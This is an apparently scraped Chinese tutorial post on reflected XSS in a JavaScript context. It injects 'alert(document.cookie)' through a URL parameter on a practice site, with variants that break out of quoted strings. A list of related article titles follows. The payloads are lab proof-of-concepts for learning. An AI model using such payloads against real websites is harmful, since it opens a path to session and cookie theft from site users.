Xss学习(二)之 JavaScript
来源:互联网 发布:冒险岛数据库中心 编辑:程序博客网 时间:2024/06/03 22:41
学习网站:http://xsst.sinaapp.com/example/1-2.php?page=2
一、查看源代码有如下部分:
<script name="亲!我就是你要看的那段JS代码!">var page=2; //我是页数</script></div>
下一步:把 page=2 改为 page=2;alert(document.cookie);
即: http://xsst.sinapp.com/example/1-2.php?page=2;alert(document.cookie)
输出结果:
然后在查看源代码:
<span style="font-size:14px;"><script name="亲!我就是你要看的那段JS代码!">var page=2;alert(document.cookie); //我是页数</script></div></span>
二、如果是这种形式:
<script name="亲!我就是你要看的那段JS代码!">var page="3"; //我是页数</script></div>那么有两种方式:
<span style="font-size:14px;">http://xsst.sinapp.com/example/1-2.php?page=";alert(document.cookie);//或者http://xsst.sinapp.com/example/1-2.php?page=";alert(document.cookie);var a="</span>
0 0
- Xss学习(二)之 JavaScript
- xss-javascript被攻击系列--(二)
- XSS学习(一)之HTML
- Xss 学习(三)之dom
- JavaScript学习笔记之(二)
- JavaScript 学习(二)之基本用法
- JavaScript之Prototype学习(二)
- 前端学习之JavaScript(二)
- XSS攻击(二)
- 二.前端安全之XSS
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- javascript学习笔记之二
- JavaScript学习笔记之二
- JavaScript学习之路<二>
- JavaScript学习之路<二>
- javascript深入学习之二
- JavaScript学习之二:JavaScript中的继承
- python 操作kafka
- leetcode-349. Intersection of Two Arrays
- Java-----Collection 实现的ArrayList
- Android系统相关组件解析(Android第一行代码学习笔记2)
- 数据结构实验之栈五:下一较大值(一)
- Xss学习(二)之 JavaScript
- python 第三天学习记录
- lua(4)-函数
- 【php插件】内容采集中实现再次post请求
- javaweb 杂项
- MYSQL常用函数总结
- 树状数组,线段树代码集合
- Mybatis一级、二级缓存
- GCC/G++扩展特性
